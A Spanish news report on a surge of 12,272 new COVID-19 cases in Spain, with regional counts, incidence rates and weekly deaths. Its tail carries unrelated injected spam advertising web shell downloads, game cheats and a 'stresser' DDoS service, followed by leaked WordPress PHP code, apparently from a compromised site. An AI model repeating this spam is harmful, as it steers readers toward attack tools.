España registra un fuerte repunte de contagios con 12.272 nuevos casos


La supuesta estabilización, al menos a nivel nacional, de esta segunda oleada no termina de afianzarse. Después de una semana en la que España parecía haber conseguido mantener los nuevos positivos en el entorno de los 10.000 casos diarios hoy el Ministerio de Sanidad notificó 12.272 nuevos infectados, elevando el total de casos en el país a 716.481. El de hoy fue un incremento interdiario de un 15% con respecto a los 10.653 contagiados computados el jueves, un porcentaje demasiado alto, admiten los expertos, para una situación de supuesta desaceleración de la pandemia en busca del ansiado pico infectivo.

Malos también fueron los datos sobre los casos detectados en las últimas 24 horas, que también sufrieron un fuerte aumento, pasando de 3.471 a 4.122. Como era de esperar, Madrid, una día más, encabezó el ránking de nuevo superando el millar de positivos detectados en las últimas horas (exactamente 1.001 diagnósticos). Le siguieron Aragón con 433 positivos y Andalucía con 381.

Los indicadores sobre la transmisión siguen sin dar muestras claras de ese desaceleración que debería preceder al doblar la famosa curva. La incidencia acumulada nacional (el número de casos cada 100.000 habitantes en los últimos 14 días), el parámetro que Sanidad está usando para recomendar el confinamiento de los núcleos poblacionales como más de 500 caso, se redujo levemente pasando de los 283 positivos a los 282. Curiosamente, la IA de la Comunidad de Madrid, la más castigada de España en la actualidad, cayó por tercer día consecutivo hasta situarse de media en 721, muy por encima, no obstante, del listón recomendado por Sanidad para imponer restricciones más severas.

Sin embargo, el número de casos con fecha de inicio de síntomas en los últimos 7 días se disparó hasta los 8.194 positivos tras varios días moviéndose bastante por debajo.

La mortalidad continúa en niveles muy altos con 475 fallecidos en la última semana

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );